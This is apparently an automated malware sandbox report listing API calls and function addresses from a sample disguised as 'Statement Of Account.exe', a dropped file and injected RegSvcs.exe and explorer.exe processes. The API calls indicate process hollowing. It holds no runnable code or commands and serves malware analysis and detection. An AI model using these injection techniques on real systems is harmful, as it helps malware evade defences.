Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2D30 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_00FB2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2D10 NtMapViewOfSection,LdrInitializeThunk, 8_2_00FB2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_00FB2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2E80 NtReadVirtualMemory,LdrInitializeThunk, 8_2_00FB2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2FE0 NtCreateFile,LdrInitializeThunk, 8_2_00FB2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2FB0 NtResumeThread,LdrInitializeThunk, 8_2_00FB2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2F90 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_00FB2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2F30 NtCreateSection,LdrInitializeThunk, 8_2_00FB2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB4340 NtSetContextThread, 8_2_00FB4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB4650 NtSuspendThread, 8_2_00FB4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2AF0 NtWriteFile, 8_2_00FB2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2AB0 NtWaitForSingleObject, 8_2_00FB2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2BE0 NtQueryValueKey, 8_2_00FB2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2BA0 NtEnumerateValueKey, 8_2_00FB2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2B80 NtQueryInformationFile, 8_2_00FB2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2CF0 NtOpenProcess, 8_2_00FB2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2CC0 NtQueryVirtualMemory, 8_2_00FB2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2C60 NtCreateKey, 8_2_00FB2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2C00 NtQueryInformationProcess, 8_2_00FB2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2DB0 NtEnumerateKey, 8_2_00FB2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2D00 NtSetInformationFile, 8_2_00FB2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2EE0 NtQueueApcThread, 8_2_00FB2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2E30 NtWriteVirtualMemory, 8_2_00FB2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2FA0 NtQuerySection, 8_2_00FB2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2F60 NtCreateProcessEx, 8_2_00FB2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB3090 NtSetValueKey, 8_2_00FB3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB3010 NtOpenDirectoryObject, 8_2_00FB3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB35C0 NtCreateMutant, 8_2_00FB35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB39B0 NtGetContextThread, 8_2_00FB39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB3D70 NtOpenThread, 8_2_00FB3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB3D10 NtOpenProcessToken, 8_2_00FB3D10
Source: C:\Windows\explorer.exe Code function: 9_2_0F905E12 NtProtectVirtualMemory, 9_2_0F905E12
Source: C:\Windows\explorer.exe Code function: 9_2_0F904232 NtCreateFile, 9_2_0F904232
Source: C:\Windows\explorer.exe Code function: 9_2_0F905E0A NtProtectVirtualMemory, 9_2_0F905E0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041A360 NtCreateFile, 14_2_0041A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041A410 NtReadFile, 14_2_0041A410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041A490 NtClose, 14_2_0041A490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041A540 NtAllocateVirtualMemory, 14_2_0041A540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041A35A NtCreateFile, 14_2_0041A35A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041A53B NtAllocateVirtualMemory, 14_2_0041A53B
Detected potential crypto function
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_014ADCD4 0_2_014ADCD4
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A2B4E8 0_2_07A2B4E8
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A2B4D8 0_2_07A2B4D8
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A29478 0_2_07A29478
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A2B0B0 0_2_07A2B0B0
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A2B09F 0_2_07A2B09F
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A2BE98 0_2_07A2BE98
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A20C49 0_2_07A20C49
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A20C58 0_2_07A20C58
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A298A3 0_2_07A298A3
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A298B0 0_2_07A298B0
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_07A22838 0_2_07A22838
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101A118 8_2_0101A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01008158 8_2_01008158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010341A2 8_2_010341A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010401AA 8_2_010401AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010381CC 8_2_010381CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01012000 8_2_01012000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F70100 8_2_00F70100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103A352 8_2_0103A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010403E6 8_2_010403E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E3F0 8_2_00F8E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010002C0 8_2_010002C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01040591 8_2_01040591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01024420 8_2_01024420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01032446 8_2_01032446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80535 8_2_00F80535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102E4F6 8_2_0102E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9C6E0 8_2_00F9C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7C7C0 8_2_00F7C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 8_2_00F80770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA4750 8_2_00FA4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE8F0 8_2_00FAE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F668B8 8_2_00F668B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0104A9A6 8_2_0104A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8A840 8_2_00F8A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F82840 8_2_00F82840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F829A0 8_2_00F829A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F96962 8_2_00F96962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103AB40 8_2_0103AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7EA80 8_2_00F7EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01036BD7 8_2_01036BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F70CF2 8_2_00F70CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101CD1F 8_2_0101CD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80C00 8_2_00F80C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7ADE0 8_2_00F7ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F98DBF 8_2_00F98DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020CB5 8_2_01020CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8AD00 8_2_00F8AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01022F30 8_2_01022F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F88ECF 8_2_00F88ECF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F92E90 8_2_00F92E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80E59 8_2_00F80E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8CFE0 8_2_00F8CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103EE26 8_2_0103EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72FC8 8_2_00F72FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFEFA0 8_2_00FFEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103CE93 8_2_0103CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF4F40 8_2_00FF4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA0F30 8_2_00FA0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC2F28 8_2_00FC2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103EEDB 8_2_0103EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F870C0 8_2_00F870C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0104B16B 8_2_0104B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8B1B0 8_2_00F8B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6F172 8_2_00F6F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB516C 8_2_00FB516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102F0CC 8_2_0102F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103F0E0 8_2_0103F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010370E9 8_2_010370E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9D2F0 8_2_00F9D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103132D 8_2_0103132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9B2C0 8_2_00F9B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F852A0 8_2_00F852A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F833F3 8_2_00F833F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC739A 8_2_00FC739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6D34C 8_2_00F6D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010212ED 8_2_010212ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F83497 8_2_00F83497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01037571 8_2_01037571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F71460 8_2_00F71460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101D5B0 8_2_0101D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010495C3 8_2_010495C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103F43F 8_2_0103F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103F7B0 8_2_0103F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC5630 8_2_00FC5630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010316CC 8_2_010316CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01015910 8_2_01015910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F838E0 8_2_00F838E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F71840 8_2_00F71840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FED800 8_2_00FED800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F89950 8_2_00F89950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9B950 8_2_00F9B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FC5AA0 8_2_00FC5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103FB76 8_2_0103FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF3A6C 8_2_00FF3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FBDBF9 8_2_00FBDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF5BF0 8_2_00FF5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01037A46 8_2_01037A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103FA49 8_2_0103FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9FB80 8_2_00F9FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01021AA3 8_2_01021AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101DAAC 8_2_0101DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102DAC6 8_2_0102DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01031D5A 8_2_01031D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01037D73 8_2_01037D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF9C32 8_2_00FF9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9FDC0 8_2_00F9FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F83D40 8_2_00F83D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103FCF2 8_2_0103FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103FF09 8_2_0103FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F89EB0 8_2_00F89EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103FFB1 8_2_0103FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F81F92 8_2_00F81F92
Source: C:\Windows\explorer.exe Code function: 9_2_0F41BB30 9_2_0F41BB30
Source: C:\Windows\explorer.exe Code function: 9_2_0F41BB32 9_2_0F41BB32
Source: C:\Windows\explorer.exe Code function: 9_2_0F421232 9_2_0F421232
Source: C:\Windows\explorer.exe Code function: 9_2_0F418D02 9_2_0F418D02
Source: C:\Windows\explorer.exe Code function: 9_2_0F41E912 9_2_0F41E912
Source: C:\Windows\explorer.exe Code function: 9_2_0F4245CD 9_2_0F4245CD
Source: C:\Windows\explorer.exe Code function: 9_2_0F420036 9_2_0F420036
Source: C:\Windows\explorer.exe Code function: 9_2_0F417082 9_2_0F417082
Source: C:\Windows\explorer.exe Code function: 9_2_0F904232 9_2_0F904232
Source: C:\Windows\explorer.exe Code function: 9_2_0F9075CD 9_2_0F9075CD
Source: C:\Windows\explorer.exe Code function: 9_2_0F901912 9_2_0F901912
Source: C:\Windows\explorer.exe Code function: 9_2_0F8FBD02 9_2_0F8FBD02
Source: C:\Windows\explorer.exe Code function: 9_2_0F8FEB32 9_2_0F8FEB32
Source: C:\Windows\explorer.exe Code function: 9_2_0F8FEB30 9_2_0F8FEB30
Source: C:\Windows\explorer.exe Code function: 9_2_0F8FA082 9_2_0F8FA082
Source: C:\Windows\explorer.exe Code function: 9_2_0F903036 9_2_0F903036
Source: C:\Windows\explorer.exe Code function: 9_2_1098B082 9_2_1098B082
Source: C:\Windows\explorer.exe Code function: 9_2_10994036 9_2_10994036
Source: C:\Windows\explorer.exe Code function: 9_2_109985CD 9_2_109985CD
Source: C:\Windows\explorer.exe Code function: 9_2_10992912 9_2_10992912
Source: C:\Windows\explorer.exe Code function: 9_2_1098CD02 9_2_1098CD02
Source: C:\Windows\explorer.exe Code function: 9_2_10995232 9_2_10995232
Source: C:\Windows\explorer.exe Code function: 9_2_1098FB30 9_2_1098FB30
Source: C:\Windows\explorer.exe Code function: 9_2_1098FB32 9_2_1098FB32
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_00DADCD4 11_2_00DADCD4
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FC9780 11_2_06FC9780
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FC9778 11_2_06FC9778
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FCB3B8 11_2_06FCB3B8
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FC9348 11_2_06FC9348
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FCAF80 11_2_06FCAF80
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FCAF6F 11_2_06FCAF6F
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FC0C58 11_2_06FC0C58
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FC0C49 11_2_06FC0C49
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FCBD68 11_2_06FCBD68
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Code function: 11_2_06FC2828 11_2_06FC2828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00401028 14_2_00401028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00401030 14_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D9B7 14_2_0041D9B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041E214 14_2_0041E214
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041ECEE 14_2_0041ECEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00402D88 14_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00402D90 14_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00409E5B 14_2_00409E5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00409E60 14_2_00409E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0041D6A4 14_2_0041D6A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_00402FB0 14_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014F516C 14_2_014F516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014AF172 14_2_014AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014CB1B0 14_2_014CB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C0000 14_2_014C0000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C70C0 14_2_014C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014AD34C 14_2_014AD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014DD2F0 14_2_014DD2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C52A0 14_2_014C52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014B1460 14_2_014B1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014CB730 14_2_014CB730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014BC7C0 14_2_014BC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014B17EC 14_2_014B17EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C9950 14_2_014C9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014DB950 14_2_014DB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014D6962 14_2_014D6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C5990 14_2_014C5990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C29A0 14_2_014C29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C38E0 14_2_014C38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014B28F0 14_2_014B28F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014EE8F0 14_2_014EE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014A68B8 14_2_014A68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014FDBF9 14_2_014FDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01489B80 14_2_01489B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014BEA80 14_2_014BEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C3D40 14_2_014C3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C8DC0 14_2_014C8DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014D8DBF 14_2_014D8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014C0C00 14_2_014C0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014D9C20 14_2_014D9C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014B2FC8 14_2_014B2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01483FD2 14_2_01483FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01483FD5 14_2_01483FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_014CCFE0 14_2_014CCFE0
